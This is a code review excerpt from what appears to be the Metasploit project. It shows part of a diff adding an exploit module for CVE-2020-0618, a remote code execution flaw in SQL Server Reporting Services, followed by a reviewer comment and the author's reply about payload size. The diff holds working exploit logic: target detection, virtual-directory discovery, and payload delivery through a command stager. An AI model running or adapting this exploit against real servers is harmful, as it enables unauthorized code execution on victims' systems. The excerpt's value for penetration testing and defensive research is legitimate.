modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb

```diff
@@ -0,0 +1,110 @@
+        which can allow an attacker to craft an HTTP POST request with a
+        serialized object to achieve remote code execution. The vulnerability is
+        due to the fact that the serialized blob is not signed by the server.
+      },
+      'Author' => 'Spencer McIntyre',
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2020-0618'],
+        ['URL', 'https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/'],
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 3000 } ]
+        ],
+      'DefaultTarget'  => 1,
+      'DisclosureDate' => '2020-02-11'))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def send_api_request(*parts)
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, 'api', 'v1.0', *parts),
+      'headers'   => {
+        'Accept'  => 'application/json',
+      },
+      'username'  => datastore['USERNAME'],
+      'password'  => datastore['PASSWORD']
+    })
+    if res && res.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
+      begin
+        return JSON.parse(res.body)
+      rescue JSON::PareError
+        print_error('Received invalid JSON body in an API response body')
+      end
+    end
+  end
+
+  def check
+    json_response = send_api_request('ReportServerInfo', 'Model.SiteName')
+    return CheckCode::Unknown unless json_response && json_response['value'] == 'SQL Server Reporting Services'
+    CheckCode::Detected
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'Failed to detect the application') unless check == CheckCode::Detected
+
+    json_response = send_api_request('ReportServerInfo', 'Model.GetVirtualDirectory')
+    fail_with(Failure::UnexpectedReply, 'Failed to detect the report server virtual directory') if json_response.nil?
+    directory = json_response['value']
+    vprint_status("Detected the report server virtual directory as: #{directory}")
+
+    state = {vd: directory}
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded, state: state)
+    else
+      cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
+      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
```

Comment:
I was wondering if it was possible to set `Space` in the top level `Payload` instead of `Target` metadata in the info hash?
```ruby
'Payload'        => { 'Space' => 3000 }
```
and just using this instead of using `ARCH_CMD` `Space` value:
```suggestion
      execute_cmdstager({linemax: payload.space, delay: datastore['CMDSTAGER::DELAY'], state: state})
```
Or, maybe setting `Space` on non-`ARCH_CMD` payloads causes some issues here?

Reply:
Since the ARCH_X86 and ARCH_X64 payloads are placed in an executable and transferred over via the cmd stager, their size is arbitrary. This restriction is to limit the size of each of those individual command, which is also how large a single ARCH_CMD payload can be.